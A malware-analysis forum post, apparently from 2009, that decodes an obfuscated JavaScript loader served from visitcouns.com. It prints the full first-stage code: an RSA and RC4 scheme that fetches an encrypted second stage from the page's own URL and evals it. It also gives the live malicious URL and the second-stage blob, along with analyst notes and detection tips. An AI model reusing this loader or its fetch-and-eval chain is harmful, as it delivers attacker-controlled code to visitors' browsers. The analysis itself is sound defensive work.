Author Topic: visitcouns.com + clicksmanagementscom.com  (Read 3529 times)


May 06, 2009, 11:39:05 pm

MysteryFCM

Ref:
http://www.malwaredomainlist.com/forums/index.php?topic=2533.msg9570#msg9570

Decodes to:

/*
 * Analyst notes on the decoded first-stage loader. Identifiers are as found;
 * the code below is unchanged.
 *
 * Building blocks
 *   MII(a, b)       Builds the global `ci`: b characters drawn from `a` using
 *                   Math.random(), and returns it.
 *   BQY             Base64 alphabet plus "=".
 *   hexToString(d)  Despite the name, a base64 decoder over BQY (6 bits per
 *                   character); stops at "=" or "\n".
 *   PQE(a, b)       RC4-style key schedule and keystream XOR over a 256-entry
 *                   state; rc4Decrypt is a thin wrapper. If the global `oil`
 *                   is non-numeric (isNaN), its value is prepended to the key
 *                   and `oil` is reset to 0.
 *   A, nbi, nbv, LGD, IVC, FBO, UWR, FZZ, ...
 *                   Arbitrary-precision integers with modular exponentiation
 *                   (EWO). The multiply routine and digit width B (30/26/28)
 *                   are chosen from SEU and navigator.appName.
 *                   NOTE(review): the layout closely resembles the public jsbn
 *                   BigInteger/RSA library with renamed identifiers - confirm
 *                   by diffing against it.
 *   VXC, XRX, QWX, KFY, WWM
 *                   A second RC4-style generator used as a PRNG. Its 256-byte
 *                   pool (REC) is filled from Math.random() and the current
 *                   time; window.crypto.random is only used on old Netscape.
 *   LMO(s, n)       Pads the message as 0x00 0x02 <non-zero random bytes> 0x00
 *                   <message> and returns null when n < s.length + 11. This is
 *                   the PKCS#1 v1.5 encryption padding layout.
 *   RSAKey          setPublic (ICR) parses a hex modulus and exponent,
 *                   doPublic (ZJB) computes x^e mod n, encrypt (HBJ) returns
 *                   the result as even-length hex.
 *
 * Control flow worth noticing
 *   - The trailing for-loop that builds `sss` leaves `oil` at 53. HBJ tests
 *     `oil>1`, so it discards the `sss` argument, calls MII(BQY,53) and
 *     encrypts that fresh random string instead. The same string is left in
 *     `oil`.
 *   - The public key is a 128-hex-digit (512-bit) modulus with exponent
 *     0x10001. The hex ciphertext is stored in `nextkey` and requested as a
 *     script with src "?" + ciphertext, i.e. relative to the hosting page.
 *   - When the response later calls rc4Decrypt(nextkey, ...), PQE sees the
 *     non-numeric `oil` and uses oil + nextkey as the RC4 key. The random
 *     part never appears on the wire in clear; presumably the server recovers
 *     it by RSA-decrypting the query string. A captured URL/response pair is
 *     therefore not enough to decrypt the second stage without the private
 *     key or the in-memory value.
 *
 * Detection
 *   - Script request to the page's own path with a query string consisting
 *     only of about 128 lowercase hex characters.
 *   - Response body of the form k='<base64>' followed by eval of
 *     rc4Decrypt(nextkey, hexToString(k)).
 */
function MII(a,b){ci="";for(i=0;i<b;i++){var d=Math.floor(Math.random()*a.length);ci+=a.substring(d,d+1)}return ci}BQY="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";function hexToString(d){a="";b=0;c=1;for(i=0;i<d.length;i++){if(d.charAt(i)=="="||d.charAt(i)=="\n") break;b=b*64+BQY.indexOf(d.charAt(i));c=(c==1?64:c/4);if(c!=64){a+=String.fromCharCode(parseInt(b/c));b%=c}}return a}oil=0;function PQE(a,b){k="";if(isNaN(oil)){k=oil;oil=0}s=new Array();k+=a;a=k;for(i=oil;i<256;i++)s[i]=i;j=oil;for(i=oil;i<256;i++){j=(j+s[i]+a.charCodeAt(i%a.length))%256;x=s[i];s[i]=s[j];s[j]=x}i=oil;j=oil;c="";for(y=0;y<b.length;y++){i=(i+1)%256;j=(j+s[i])%256;x=s[i];s[i]=s[j];s[j]=x;c+=String.fromCharCode(b.charCodeAt(y)^s[(s[i]+s[j])%256])}return c}function rc4Decrypt(a,b){return PQE(a,b)}SEU=((0xdeadbeefcafe&0xffffff)==0xefcafe);function A(a,b,c){if(a!=null)if("number"==typeof a)this.fromNumber(a,b,c);else if(b==null&&"string"!=typeof a)this.QZP(a,256);else this.QZP(a,b)}function nbi(){return new A(null)}function LGD(i,x,w,j,c,n){while(--n>=0){var v=x*this[i++]+w[j]+c;c=Math.floor(v/0x4000000);w[j++]=v&0x3ffffff}return c}function IVC(i,x,w,j,c,n){var a=x&0x7fff,xh=x>>15;while(--n>=0){var l=this[i]&0x7fff;var h=this[i++]>>15;var m=xh*l+h*a;l=a*l+((m&0x7fff)<<15)+w[j]+(c&0x3fffffff);c=(l>>>30)+(m>>>15)+xh*h+(c>>>30);w[j++]=l&0x3fffffff}return c}function FBO(i,x,w,j,c,n){var a=x&0x3fff,xh=x>>14;while(--n>=0){var l=this[i]&0x3fff;var h=this[i++]>>14;var m=xh*l+h*a;l=a*l+((m&0x3fff)<<14)+w[j]+c;c=(l>>28)+(m>>14)+xh*h;w[j++]=l&0xfffffff}return c}if(SEU&&(navigator.appName=="Microsoft Internet Explorer")){A.prototype.am=IVC;B=30}else if(SEU&&(navigator.appName!="Netscape")){A.prototype.am=LGD;B=26}else{A.prototype.am=FBO;B=28}A.prototype.DB=B;A.prototype.DM=((1<<B)-1);A.prototype.DV=(1<<B);var BI_FP=52;A.prototype.FV=Math.pow(2,BI_FP);A.prototype.F1=BI_FP-B;A.prototype.F2=2*B-BI_FP;var ZSY="0123456789abcdefghijklmnopqrstuvwxyz";var RHZ=new Array();var 
rr,vv;rr="0".charCodeAt(0);for(vv=0;vv<=9;++vv)RHZ[rr++]=vv;rr="a".charCodeAt(0);for(vv=10;vv<36;++vv)RHZ[rr++]=vv;rr="A".charCodeAt(0);for(vv=10;vv<36;++vv)RHZ[rr++]=vv;function GJM(n){return ZSY.charAt(n)}function WCI(s,i){var c=RHZ[s.charCodeAt(i)];return(c==null)?-1:c}function HTK(r){for(var i=this.t-1;i>=0;--i)r[i]=this[i];r.t=this.t;r.s=this.s}function ZWO(x){this.t=1;this.s=(x<0)?-1:0;if(x>0)this[0]=x;else if(x<-1)this[0]=x+DV;else this.t=0}function nbv(i){var r=nbi();r.VFO(i);return r}function KTQ(s,b){var k;if(b==16)k=4;else if(b==8)k=3;else if(b==256)k=8;else if(b==2)k=1;else if(b==32)k=5;else if(b==4)k=2;else{this.fromRadix(s,b);return}this.t=0;this.s=0;var i=s.length,mi=false,sh=0;while(--i>=0){var x=(k==8)?s[i]&0xff:WCI(s,i);if(x<0){if(s.charAt(i)=="-")mi=true;continue}mi=false;if(sh==0)this[this.t++]=x;else if(sh+k>this.DB){this[this.t-1]|=(x&((1<<(this.DB-sh))-1))<<sh;this[this.t++]=(x>>(this.DB-sh))}else this[this.t-1]|=x<<sh;sh+=k;if(sh>=this.DB)sh-=this.DB}if(k==8&&(s[0]&0x80)!=0){this.s=-1;if(sh>0)this[this.t-1]|=((1<<(this.DB-sh))-1)<<sh}this.OYN();if(mi)A.FVJ.EKV(this,this)}function PCY(){var c=this.s&this.DM;while(this.t>0&&this[this.t-1]==c)--this.t}function CJI(b){if(this.s<0)return"-"+this.OBN().SLR(b);var k;if(b==16)k=4;else if(b==8)k=3;else if(b==2)k=1;else if(b==32)k=5;else if(b==4)k=2;else return this.toRadix(b);var a=(1<<k)-1,d,m=false,r="",i=this.t;var p=this.DB-(i*this.DB)%k;if(i-->0){if(p<this.DB&&(d=this[i]>>p)>0){m=true;r=GJM(d)}while(i>=0){if(p<k){d=(this[i]&((1<<p)-1))<<(k-p);d|=this[--i]>>(p+=this.DB-k)}else{d=(this[i]>>(p-=k))&a;if(p<=0){p+=this.DB;--i}}if(d>0)m=true;if(m)r+=GJM(d)}}return m?r:"0"}function HLQ(){var r=nbi();A.FVJ.EKV(this,r);return r}function KHO(){return(this.s<0)?this.OBN():this}function QRQ(a){var r=this.s-a.s;if(r!=0)return r;var i=this.t;r=i-a.t;if(r!=0)return r;while(--i>=0)if((r=this[i]-a[i])!=0)return r;return 0}function MWY(x){var 
r=1,t;if((t=x>>>16)!=0){x=t;r+=16}if((t=x>>8)!=0){x=t;r+=8}if((t=x>>4)!=0){x=t;r+=4}if((t=x>>2)!=0){x=t;r+=2}if((t=x>>1)!=0){x=t;r+=1}return r}function YSB(){if(this.t<=0)return 0;return this.DB*(this.t-1)+MWY(this[this.t-1]^(this.s&this.DM))}function GZT(n,r){var i;for(i=this.t-1;i>=0;--i)r[i+n]=this[i];for(i=n-1;i>=0;--i)r[i]=0;r.t=this.t+n;r.s=this.s}function QYQ(n,r){for(var i=n;i<this.t;++i)r[i-n]=this[i];r.t=Math.max(this.t-n,0);r.s=this.s}function EJJ(n,r){var a=n%this.DB;var b=this.DB-a;var d=(1<<b)-1;var e=Math.floor(n/this.DB),c=(this.s<<a)&this.DM,i;for(i=this.t-1;i>=0;--i){r[i+e+1]=(this[i]>>b)|c;c=(this[i]&d)<<a}for(i=e-1;i>=0;--i)r[i]=0;r[e]=c;r.t=this.t+e+1;r.s=this.s;r.OYN()}function UYK(n,r){r.s=this.s;var a=Math.floor(n/this.DB);if(a>=this.t){r.t=0;return}var b=n%this.DB;var c=this.DB-b;var d=(1<<b)-1;r[0]=this[a]>>b;for(var i=a+1;i<this.t;++i){r[i-a-1]|=(this[i]&d)<<c;r[i-a]=this[i]>>b}if(b>0)r[this.t-a-1]|=(this.s&d)<<c;r.t=this.t-a;r.OYN()}function TZT(a,r){var i=0,c=0,m=Math.min(a.t,this.t);while(i<m){c+=this[i]-a[i];r[i++]=c&this.DM;c>>=this.DB}if(a.t<this.t){c-=a.s;while(i<this.t){c+=this[i];r[i++]=c&this.DM;c>>=this.DB}c+=this.s}else{c+=this.s;while(i<a.t){c-=a[i];r[i++]=c&this.DM;c>>=this.DB}c-=a.s}r.s=(c<0)?-1:0;if(c<-1)r[i++]=this.DV+c;else if(c>0)r[i++]=c;r.t=i;r.OYN()}function BHF(a,r){var x=this.abs(),y=a.abs();var i=x.t;r.t=i+y.t;while(--i>=0)r[i]=0;for(i=0;i<y.t;++i)r[i+x.t]=x.am(0,y[i],r,i,0,x.t);r.s=0;r.OYN();if(this.s!=a.s)A.FVJ.EKV(r,r)}function RQL(r){var x=this.abs();var i=r.t=2*x.t;while(--i>=0)r[i]=0;for(i=0;i<x.t-1;++i){var c=x.am(i,x[i],r,2*i,0,1);if((r[i+x.t]+=x.am(i+1,2*x[i],r,2*i+1,c,x.t-i-1))>=x.DV){r[i+x.t]-=x.DV;r[i+x.t+1]=1}}if(r.t>0)r[r.t-1]+=x.am(i,x[i],r,2*i,0,1);r.s=0;r.OYN()}function FHD(m,q,r){var a=m.abs();if(a.t<=0)return;var b=this.abs();if(b.t<a.t){if(q!=null)q.VFO(0);if(r!=null)this.TZY(r);return}if(r==null)r=nbi();var y=nbi(),ts=this.s,ms=m.s;var 
c=this.DB-MWY(a[a.t-1]);if(c>0){a.JZT(c,y);b.JZT(c,r)}else{a.TZY(y);b.TZY(r)}var d=y.t;var f=y[d-1];if(f==0)return;var g=f*(1<<this.F1)+((d>1)?y[d-2]>>this.F2:0);var h=this.FV/g,d2=(1<<this.F1)/g,e=1<<this.F2;var i=r.t,j=i-d,t=(q==null)?nbi():q;y.YWW(j,t);if(r.PKM(t)>=0){r[r.t++]=1;r.EKV(t,r)}A.ONE.YWW(d,t);t.EKV(y,y);while(y.t<d)y[y.t++]=0;while(--j>=0){var k=(r[--i]==f)?this.DM:Math.floor(r[i]*h+(r[i-1]+e)*d2);if((r[i]+=y.am(0,k,r,j,0,d))<k){y.YWW(j,t);r.EKV(t,r);while(r[i]<--k)r.EKV(t,r)}}if(q!=null){r.QWB(d,q);if(ts!=ms)A.FVJ.EKV(q,q)}r.t=d;r.OYN();if(c>0)r.KSV(c,r);if(ts<0)A.FVJ.EKV(r,r)}function URR(a){var r=nbi();this.abs().CIX(a,null,r);if(this.s<0&&r.PKM(A.FVJ)>0)a.EKV(r,r);return r}function UWR(m){this.m=m}function NMQ(x){if(x.s<0||x.PKM(this.m)>=0)return x.mod(this.m);else return x}function EQY(x){return x}function MLW(x){x.CIX(this.m,null,x)}function WEV(x,y,r){x.ETT(y,r);this.VBX(r)}function PFD(x,r){x.ENT(r);this.VBX(r)}UWR.prototype.DYC=NMQ;UWR.prototype.FQV=EQY;UWR.prototype.VBX=MLW;UWR.prototype.ZXK=WEV;UWR.prototype.XKS=PFD;function UVT(){if(this.t<1)return 0;var x=this[0];if((x&1)==0)return 0;var y=x&3;y=(y*(2-(x&0xf)*y))&0xf;y=(y*(2-(x&0xff)*y))&0xff;y=(y*(2-(((x&0xffff)*y)&0xffff)))&0xffff;y=(y*(2-x*y%this.DV))%this.DV;return(y>0)?this.DV-y:-y}function FZZ(m){this.m=m;this.mp=m.QYW();this.mpl=this.mp&0x7fff;this.mph=this.mp>>15;this.um=(1<<(m.DB-15))-1;this.mt2=2*m.t}function IVS(x){var r=nbi();x.abs().YWW(this.m.t,r);r.CIX(this.m,null,r);if(x.s<0&&r.PKM(A.FVJ)>0)this.m.EKV(r,r);return r}function HPJ(x){var r=nbi();x.TZY(r);this.VBX(r);return r}function YJG(x){while(x.t<=this.mt2)x[x.t++]=0;for(var i=0;i<this.m.t;++i){var j=x[i]&0x7fff;var a=(j*this.mpl+(((j*this.mph+(x[i]>>15)*this.mpl)&this.um)<<15))&x.DM;j=i+this.m.t;x[j]+=this.m.am(0,a,x,i,0,this.m.t);while(x[j]>=x.DV){x[j]-=x.DV;x[++j]++}}x.OYN();x.QWB(this.m.t,x);if(x.PKM(this.m)>=0)x.EKV(this.m,x)}function PWS(x,r){x.ENT(r);this.VBX(r)}function 
FZI(x,y,r){x.ETT(y,r);this.VBX(r)}FZZ.prototype.DYC=IVS;FZZ.prototype.FQV=HPJ;FZZ.prototype.VBX=YJG;FZZ.prototype.ZXK=FZI;FZZ.prototype.XKS=PWS;function DLT(){return((this.t>0)?(this[0]&1):this.s)==0}function ZIX(e,z){if(e>0xffffffff||e<1)return A.ONE;var r=nbi(),r2=nbi(),g=z.DYC(this),i=MWY(e)-1;g.TZY(r);while(--i>=0){z.XKS(r,r2);if((e&(1<<i))>0)z.ZXK(r2,g,r);else{var t=r;r=r2;r2=t}}return z.FQV(r)}function VTZ(e,m){var z;if(e<256||m.FNV())z=new UWR(m);else z=new FZZ(m);return this.exp(e,z)}A.prototype.TZY=HTK;A.prototype.VFO=ZWO;A.prototype.QZP=KTQ;A.prototype.OYN=PCY;A.prototype.YWW=GZT;A.prototype.QWB=QYQ;A.prototype.JZT=EJJ;A.prototype.KSV=UYK;A.prototype.EKV=TZT;A.prototype.ETT=BHF;A.prototype.ENT=RQL;A.prototype.CIX=FHD;A.prototype.QYW=UVT;A.prototype.FNV=DLT;A.prototype.exp=ZIX;A.prototype.SLR=CJI;A.prototype.OBN=HLQ;A.prototype.abs=KHO;A.prototype.PKM=QRQ;A.prototype.ITF=YSB;A.prototype.mod=URR;A.prototype.EWO=VTZ;A.FVJ=nbv(0);A.ONE=nbv(1);function VXC(){this.i=0;this.j=0;this.S=new Array()}function XRX(a){var i,j,t;for(i=0;i<256;++i)this.S[i]=i;j=0;for(i=0;i<256;++i){j=(j+this.S[i]+a[i%a.length])&255;t=this.S[i];this.S[i]=this.S[j];this.S[j]=t}this.i=0;this.j=0}function QWX(){var t;this.i=(this.i+1)&255;this.j=(this.j+this.S[this.i])&255;t=this.S[this.i];this.S[this.i]=this.S[this.j];this.S[this.j]=t;return this.S[(t+this.S[this.i])&255]}VXC.prototype.init=XRX;VXC.prototype.next=QWX;function PES(){return new VXC()}var REC=256;var VHY;var KFY;var RWD;function IKH(x){KFY[RWD++]^=x&255;KFY[RWD++]^=(x>>8)&255;KFY[RWD++]^=(x>>16)&255;KFY[RWD++]^=(x>>24)&255;if(RWD>=REC)RWD-=REC}function RIP(){IKH(new Date().getTime())}if(KFY==null){KFY=new Array();RWD=0;var t;if(navigator.appName=="Netscape"&&navigator.appVersion<"5"&&window.crypto){var z=window.crypto.random(32);for(t=0;t<z.length;++t)KFY[RWD++]=z.charCodeAt(t)&255}while(RWD<REC){t=Math.floor(65536*Math.random());KFY[RWD++]=t>>>8;KFY[RWD++]=t&255}RWD=0;RIP()}function 
WWM(){if(VHY==null){RIP();VHY=PES();VHY.init(KFY);for(RWD=0;RWD<KFY.length;++RWD)KFY[RWD]=0;RWD=0}return VHY.next()}function WWMs(a){var i;for(i=0;i<a.length;++i)a[i]=WWM()}function WFW(){}WFW.prototype.YBI=WWMs;function QEE(a,r){return new A(a,r)}function NYB(s,n){var a="";var i=0;while(i+n<s.length){a+=s.substring(i,i+n)+"\n";i+=n}return a+s.substring(i,s.length)}function OVS(b){if(b<0x10)return"0"+b.SLR(16);else return b.SLR(16)}function LMO(s,n){if(n<s.length+11){return null}var a=new Array();var i=s.length-1;while(i>=0&&n>0)a[--n]=s.charCodeAt(i--);a[--n]=0;var b=new WFW();var x=new Array();while(n>2){x[0]=0;while(x[0]==0)b.YBI(x);a[--n]=x[0]}a[--n]=2;a[--n]=0;return new A(a)}function RSAKey(){this.n=null;this.e=0;this.d=null;this.p=null;this.q=null;this.QUF=null;this.EUW=null;this.CME=null}function ICR(N,E){if(N!=null&&E!=null&&N.length>0&&E.length>0){this.n=QEE(N,16);this.e=parseInt(E,16)}}function ZJB(x){return x.EWO(this.e,this.n)}function HBJ(a){if(oil>1){oil=MII(BQY,53);a=ci};var m=LMO(a,(this.n.ITF()+7)>>3);if(m==null)return null;var c=this.doPublic(m);if(c==null)return null;var h=c.SLR(16);if((h.length&1)==0)return h;else return"0"+h}RSAKey.prototype.doPublic=ZJB;RSAKey.prototype.setPublic=ICR;RSAKey.prototype.encrypt=HBJ;sss="";for(oil=0;oil<53;oil++)sss+=String.fromCharCode(Math.floor(75+Math.sin(oil)*21));rsa=new RSAKey();rsa.setPublic("98310ec1246fa9068f780f78625c121385134f2af68d26c8a81530ab118834d508827ac76d88c3368c35b20094bded52ed2ec26a4a6be8685f4c2d744e992751","10001");res=rsa.encrypt(sss);nextkey=res;var scriptTag=document.createElement("script");scriptTag.src="?"+res;document.body.appendChild(scriptTag);
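Result is (the script appends a script tag whose src is "?" followed by the hex output of rsa.encrypt, so the request goes back to the hosting page's own URL):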

http://visitcouns.com/?51a436215586b44bf7da7a9a9779e2b24561b10503d40cbb71b54c93cd16b47a9c49bc400afc4e2fb10257de425c90417516a2820df467baba4ceac544aa5778

Which contains:

/*
 * Analyst notes on the second-stage response. The code below is unchanged.
 *
 * - `k` is a base64 blob. hexToString in the first-stage listing on this page
 *   is a base64 decoder despite its name, and it stops at "=" or "\n".
 * - The decoded bytes go through rc4Decrypt (PQE in the first stage). The
 *   effective RC4 key is not `nextkey` alone: PQE prepends the global `oil`
 *   when it is non-numeric, and the first stage's encrypt routine leaves a
 *   random 53-character string there. That string is only sent RSA-encrypted,
 *   so this blob cannot be decrypted from a captured request/response pair
 *   without the RSA private key or the in-memory value.
 * - SECURITY: the decrypted text `t` is passed straight to eval(), so the
 *   server fully controls the code that runs in the page.
 *   eval('rc4Decrypt') is only an indirect way of naming the function.
 *   For analysis, the final eval is the point at which to log `t` instead of
 *   executing it.
 * - NOTE(review): the line break inside the string literal is as it appears
 *   in this listing. A raw newline is not valid inside a single-quoted
 *   JavaScript string, so it is presumably a wrapping artifact of the post;
 *   confirm against the original response.
 */
k='Tx+F9/zGRjx6hh66lNn3HnqtgyQwlMhnZxHIzUv+v8bE6yn2ALfrplTAXb4WQORLnH4X2vqNfBdp6P8ngBhiZ4Tab+TLzzjsVY18p76398TLz1qYI9cOyJx1J3EvNQgcdjbarEKE8i/WPil18uFNV8vVB5F27urQo9lEUxXnxgByjv5irhoS0mY1fJl1HlBgRSINqeNq7kyfxVp6WZDN8XP3r4mmHCRwlAzM+PCTVKf6zH7zn1fUoNp8AEoAPaREF66rmdwZef3tqaVmTxnY06jRsQqWXnSnHuhjkNxcLzDs1Z8Mza3CrRoga8hf/Vp/JsKxOFkuExjjqEh//1s3jY9K5vctk6p4sSqxVIl7t/xvRbgDeInmUVaBKJDZejlIt3bwNQD8BR0N1P6kK3DbCSjIcpRF9IsQrY3rHFAftuwQ2TM2UJZJe25rTGFpJADBXS4o2w/BQocVlADMkFajw3oiW4nRTNZtgUlvcxH+RqtBVerme8nbdboUMywg8KV2S5tFT5LrIsH+LEISpl2YcfgmBwreJ3yC2MDvgzuzawDoC2RLyc5DgIDBkKF61bM4l4yCyhyYwf35XRcvk186AGkE6i8ricJTO3bIsHNOQTZ5ZJUAMT9e5umCnRlwjG1+9ctAxiQYpKIfXqqsGhAueRl3eo1uGpqRVRu2J8a7RuRErGIuxomoRiLNJmZI6cxjlE3sSE3kN8aEvasWNdxHJ3ViormomepUFKWvUtPsJycYCWps3c9zSvpmLop6Z2HMC9AG1uFeuw6ogR5RNnPD15cQaO9+0248ek3oT7eqK0H0UO8YxlHOMJr9n9rfkRaacms5D5qA6HOFvNtoagz7AR7Z4LksQejSOHmUJbKQn37veKcYd4GlTmJcY0br4vwLws8HcUuZWZjvthOGYLWmNTqZxwT4/Lqdj8WYnf1pwVwSk2k3jufopgRT35TvKpb7FWoJ55tQqq3HpBojfNfuVel9ttTQ2qOpm/5uNEunGTzjHEDyidKbI5/iYGV05nL/tBo9s1VVPC82KpPtBnXQXbv0L1JBnZPfxgceHSwmqA1bbuxtyePf+q6PTurJwFPwZcS7fp8xA4avuXiUQFPL/tplXH/AVO/shdq10JuK14DtLW/FmeDvxT+HJ8iSmFK/6EvPL9/41GmH4/zST4eDWvo2zRgi1do9wsMLD/l0aiFMEblR2nBhcH6BIar6zPJVCh8zBZQv1fFw/LlEF0NtN3oeMuGREx4ICOo13R3kbY51FdpG1qmJxXXcCrPzlZD1lfSVID97kQHPyPtjs2BtoOcM6yVwhaxRefTA0ZfREyxBofFyub+2A1/pEEwnXJoIk6BXh7JqEvzmN1cDqBXq4iVBMOz6WiLXKF8DtGel6IZ8/nK4tXTMFPVJyyH4yw9haFBMIwxwf7u651wcSzguxWHExtYqm+VjgU6W7ue5Vxcq2e13Q5LMVmdFVy0kT9ajS0PPBO3kzlG38zUVsKvXbHfYsSmj6FcpKBQiuR3lFbJCtENeJ3cgEFwMkO04yd1pFWz9wCj5JH9Ryi+2R4J4AZ7mksm6NXkRX083pSfjmUsx0r3pnyrynny6b12A3CobSFMocFb/J1nkFtY7sG+VMzv/i9AfdqFehWEJTwviEz3QuY9ownclhrZ73HVQY5kv31xbzmajOd9+eRpIqI+TEooIOrc86b63Sczn8OANl5h74jAWBK34c4OyhUvhCy5nU8nHT6iQmtRZPTwl33Kbo8ivNEKVJNquzMGZS6crAFxK9BNzXkLPyd0u38VI479BR5Vz3M3/LCRx/iPAIU16ZLK3V2weonBx2HquWH+4mn+Bbs26DLJgnsUUqpbSoSPzzG3iS6BknutNSNJJ9Gd9c7CQIAtevVugvpa7TMSutAfvGXsyFTzNqZiU4j5qmagj9gWusLvqUIKhEXpPzBC0ogpKtrMl8C5TJaj6epAUkTiG5fnH9YUh1g7NSIog/mu02csMoBLbj+yBW
FZLIWQZBfI53YEbbXzD/mJq+5A8U5iR';t=eval('rc4Decrypt')(nextkey,hexToString(k));eval(t);
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net